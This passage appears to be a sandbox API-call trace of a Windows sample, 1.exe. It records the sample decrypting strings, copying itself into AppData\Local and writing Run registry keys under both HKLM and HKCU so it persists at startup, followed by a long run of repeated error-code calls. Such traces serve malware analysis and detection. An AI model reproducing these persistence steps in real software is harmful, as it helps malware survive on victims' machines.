pbData=0x2a61310, pdwDataLen=0xcffbf8) returned 1 [0039.492] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0039.492] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61310 | out: hHeap=0x2a60000) returned 1 [0039.492] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x2a61280, nSize=0x1d | out: lpDst="") returned 0x1e [0039.492] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a612c8 | out: hHeap=0x2a60000) returned 1 [0039.492] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a61280, Size=0x72) returned 0x2a61280 [0039.492] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x72) returned 0x2a61300 [0039.492] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61380 [0039.492] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbdc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc44 | out: phKey=0xcffc44*=0xf58ce8) returned 1 [0039.492] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc2c, dwFlags=0x0) returned 1 [0039.492] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61380, pdwDataLen=0xcffbf8 | out: pbData=0x2a61380, pdwDataLen=0xcffbf8) returned 1 [0039.492] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0039.492] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61380 | out: hHeap=0x2a60000) returned 1 [0039.492] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x2a61280, nSize=0x39 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x1e [0039.492] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61300 | out: hHeap=0x2a60000) returned 1 [0039.492] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.492] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a61300 [0039.492] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffc04, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc6c | out: phKey=0xcffc6c*=0xf58ee8) returned 1 [0039.492] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0xcffc54, dwFlags=0x0) returned 1 [0039.492] CryptDecrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61300, pdwDataLen=0xcffc20 | out: pbData=0x2a61300, pdwDataLen=0xcffc20) returned 1 [0039.492] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0039.492] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x3e) returned 0x2a61348 [0039.492] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3e) returned 0x2a61390 [0039.492] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a613d8 [0039.492] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbdc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc44 | out: phKey=0xcffc44*=0xf58ce8) returned 1 [0039.492] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc2c, dwFlags=0x0) returned 1 [0039.492] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a613d8, pdwDataLen=0xcffbf8 | out: pbData=0x2a613d8, pdwDataLen=0xcffbf8) returned 1 [0039.492] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0039.492] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x10) returned 0x2a61258 [0039.492] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcffbc0 | out: phkResult=0xcffbc0*=0x224) returned 0x0 [0039.493] RegQueryValueExW (in: hKey=0x224, lpValueName="Startup", lpReserved=0x0, lpType=0xcffbbc, lpData=0x2a61390, lpcbData=0xcffbc4*=0x3e | out: lpType=0xcffbbc*=0x2, lpData=0x2a61390*=0xe0, lpcbData=0xcffbc4*=0x98) returned 0xea [0039.493] RegCloseKey (hKey=0x224) returned 0x0 [0039.493] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.493] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a613d8 | out: hHeap=0x2a60000) returned 1 [0039.493] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61390 | out: hHeap=0x2a60000) returned 1 [0039.493] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a61348, Size=0x7a) returned 0x2a61348 [0039.493] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x7a) returned 0x2a613d0 [0039.493] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61458 [0039.493] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc40 | out: phKey=0xcffc40*=0xf58ce8) returned 1 [0039.493] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0xcffc28, dwFlags=0x0) returned 1 [0039.493] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61458, pdwDataLen=0xcffbf4 | out: pbData=0x2a61458, pdwDataLen=0xcffbf4) returned 1 [0039.493] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0039.493] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x10) returned 0x2a61258 [0039.493] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcffbbc | out: phkResult=0xcffbbc*=0x224) returned 0x0 [0039.493] RegQueryValueExW (in: hKey=0x224, lpValueName="Startup", lpReserved=0x0, lpType=0xcffbb8, lpData=0x2a613d0, lpcbData=0xcffbc0*=0x7a | out: lpType=0xcffbb8*=0x2, lpData=0x2a613d0*=0xe0, lpcbData=0xcffbc0*=0x98) returned 0xea [0039.493] RegCloseKey (hKey=0x224) returned 0x0 [0039.493] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.493] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61458 | out: hHeap=0x2a60000) returned 1 [0039.493] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a613d0 | out: hHeap=0x2a60000) returned 1 [0039.493] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a61348, Size=0xf2) returned 0x2a61348 [0039.493] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xf2) returned 0x2a643e0 [0039.493] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61448 [0039.493] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc40 | out: phKey=0xcffc40*=0xf590a8) returned 1 [0039.493] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0xcffc28, dwFlags=0x0) returned 1 [0039.493] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61448, pdwDataLen=0xcffbf4 | out: pbData=0x2a61448, pdwDataLen=0xcffbf4) returned 1 [0039.493] CryptDestroyKey (hKey=0xf590a8) returned 1 [0039.493] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x10) returned 0x2a61258 [0039.493] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcffbbc | out: phkResult=0xcffbbc*=0x224) returned 0x0 [0039.493] RegQueryValueExW (in: hKey=0x224, lpValueName="Startup", lpReserved=0x0, lpType=0xcffbb8, lpData=0x2a643e0, lpcbData=0xcffbc0*=0xf2 | out: lpType=0xcffbb8*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0xcffbc0*=0x98) returned 0x0 [0039.493] RegCloseKey (hKey=0x224) returned 0x0 [0039.494] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.494] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61258 [0039.494] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcffbbc | out: phkResult=0xcffbbc*=0x224) returned 0x0 [0039.494] RegQueryValueExW (in: hKey=0x224, lpValueName="Common Startup", lpReserved=0x0, lpType=0xcffbb8, lpData=0x2a64478, lpcbData=0xcffbc0*=0x5a | out: lpType=0xcffbb8*=0x0, lpData=0x2a64478*=0x0, lpcbData=0xcffbc0*=0x5a) returned 0x2 [0039.494] RegCloseKey (hKey=0x224) returned 0x0 [0039.494] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcffbd0 | out: phkResult=0xcffbd0*=0x224) returned 0x0 [0039.494] RegQueryValueExW (in: hKey=0x224, lpValueName="Common Startup", lpReserved=0x0, lpType=0xcffbcc, lpData=0x2a64478, lpcbData=0xcffbd4*=0x5a | out: lpType=0xcffbcc*=0x2, lpData=0x2a64478*=0x0, lpcbData=0xcffbd4*=0x78) returned 0xea [0039.494] RegCloseKey (hKey=0x224) returned 0x0 [0039.494] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.494] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61448 | out: hHeap=0x2a60000) returned 1 [0039.494] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a643e0 | out: hHeap=0x2a60000) returned 1 [0039.494] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a61348, Size=0x1e2) returned 0x2a61348 [0039.494] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e2) returned 0x2a643e0 [0039.494] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a645d0 [0039.494] CryptImportKey (in: hProv=0xf466e8, pbData=0xcffbd8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xcffc40 | out: phKey=0xcffc40*=0xf58e28) returned 1 [0039.494] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0xcffc28, dwFlags=0x0) returned 1 [0039.494] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a645d0, pdwDataLen=0xcffbf4 | out: pbData=0x2a645d0, pdwDataLen=0xcffbf4) returned 1 [0039.494] CryptDestroyKey (hKey=0xf58e28) returned 1 [0039.494] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x10) returned 0x2a61258 [0039.494] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcffbbc | out: phkResult=0xcffbbc*=0x224) returned 0x0 [0039.494] RegQueryValueExW (in: hKey=0x224, lpValueName="Startup", lpReserved=0x0, lpType=0xcffbb8, lpData=0x2a643e0, lpcbData=0xcffbc0*=0x1e2 | out: lpType=0xcffbb8*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0xcffbc0*=0x98) returned 0x0 [0039.494] RegCloseKey (hKey=0x224) returned 0x0 [0039.494] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.494] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61258 [0039.494] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcffbbc | out: phkResult=0xcffbbc*=0x224) returned 0x0 [0039.494] RegQueryValueExW (in: hKey=0x224, lpValueName="Common Startup", lpReserved=0x0, lpType=0xcffbb8, lpData=0x2a64478, lpcbData=0xcffbc0*=0x14a | out: lpType=0xcffbb8*=0x0, lpData=0x2a64478*=0x0, lpcbData=0xcffbc0*=0x14a) returned 0x2 [0039.494] RegCloseKey (hKey=0x224) returned 0x0 [0039.494] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xcffbd0 | out: phkResult=0xcffbd0*=0x224) returned 0x0 [0039.494] RegQueryValueExW (in: hKey=0x224, lpValueName="Common Startup", lpReserved=0x0, lpType=0xcffbcc, lpData=0x2a64478, lpcbData=0xcffbd4*=0x14a | out: lpType=0xcffbcc*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0xcffbd4*=0x78) returned 0x0 [0039.494] RegCloseKey (hKey=0x224) returned 0x0 [0039.495] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.495] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a645d0 | out: hHeap=0x2a60000) returned 1 [0039.495] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpDst=0x2a61348, nSize=0xf1 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x8b [0039.495] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a643e0 | out: hHeap=0x2a60000) returned 1 [0039.495] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61300 | out: hHeap=0x2a60000) returned 1 [0039.495] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a643e0 [0039.495] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a645f8 [0039.495] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a64810 [0039.495] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a64a28 [0039.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a643e0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0039.495] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a64c40 [0039.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a64c40, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0039.495] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64c40 | out: hHeap=0x2a60000) returned 1 [0039.495] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20a) returned 0x2a64c40 [0039.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a64c40, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0039.495] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a64c40 | out: hHeap=0x2a60000) returned 1 [0039.495] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\1.exe"), bFailIfExists=0) returned 1 [0039.507] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0xcffcd4 | out: phkResult=0xcffcd4*=0x224) returned 0x0 [0039.507] RegSetValueExW (in: hKey=0x224, lpValueName="1", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe", cbData=0x46 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe") returned 0x0 [0039.507] RegCloseKey (hKey=0x224) returned 0x0 [0039.507] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0xcffcc0 | out: phkResult=0xcffcc0*=0x224) returned 0x0 [0039.507] RegSetValueExW (in: hKey=0x224, lpValueName="1", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe", cbData=0x46 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe") returned 0x0 [0039.507] RegCloseKey (hKey=0x224) returned 0x0 [0039.507] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x118) returned 0x2a64c40 [0039.507] GetLastError () returned 0x0 [0039.507] SetLastError (dwErrCode=0x0) [0039.507] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.508] SetLastError (dwErrCode=0x0) [0039.508] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.509] SetLastError (dwErrCode=0x0) [0039.509] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.510] GetLastError () returned 0x0 [0039.510] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.511] SetLastError (dwErrCode=0x0) [0039.511] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.512] GetLastError () returned 0x0 [0039.512] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.513] SetLastError (dwErrCode=0x0) [0039.513] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.514] SetLastError (dwErrCode=0x0) [0039.514] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.515] GetLastError () returned 0x0 [0039.515] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.516] SetLastError (dwErrCode=0x0) [0039.516] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 [0039.517] SetLastError (dwErrCode=0x0) [0039.517] GetLastError () returned 0x0 